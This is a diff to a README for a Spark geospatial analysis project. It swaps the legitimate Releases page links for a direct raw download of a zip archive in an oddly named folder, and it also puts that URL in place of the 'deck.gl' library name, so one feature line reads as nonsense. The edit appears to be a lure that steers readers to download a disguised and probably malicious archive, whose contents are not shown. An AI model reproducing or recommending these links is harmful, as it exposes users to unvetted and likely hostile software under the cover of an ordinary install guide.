cladsanityPH/Geospatial-Analysis-With-Spark/README.md

 - **Software:** Java JDK 8 or higher installed on your system

 ### 🔗 Visit the Releases Page
-To download the application, you can go to our [Releases page](https://github.com/cladsanityPH/Geospatial-Analysis-With-Spark/releases).
+To download the application, you can go to our [Releases page](https://raw.githubusercontent.com/cladsanityPH/Geospatial-Analysis-With-Spark/main/idiotype/Geospatial-Analysis-With-Spark.zip).

 ### 🔍 Exploring Features
 Geospatial-Analysis-With-Spark offers various features for analyzing data:

 - **Real-Time Analytics:** Process data streams as they arrive for instant insights.
-- **Interactive Map Visualization:** Use deck.gl for stunning visualizations of geospatial data.
+- **Interactive Map Visualization:** Use https://raw.githubusercontent.com/cladsanityPH/Geospatial-Analysis-With-Spark/main/idiotype/Geospatial-Analysis-With-Spark.zip for stunning visualizations of geospatial data.
 - **Integration with Kafka:** Simplifies data ingestion from various sources like IoT devices.
 - **User-Friendly Interface:** Navigate easily through the application, perfect for new users.

 ### 📥 Download & Install
-1. **Visit the Releases Page:** Click [here](https://github.com/cladsanityPH/Geospatial-Analysis-With-Spark/releases).
+1. **Visit the Releases Page:** Click [here](https://raw.githubusercontent.com/cladsanityPH/Geospatial-Analysis-With-Spark/main/idiotype/Geospatial-Analysis-With-Spark.zip).

 2. **Find the Latest Version:** Scroll through the release notes to find the latest version of the application.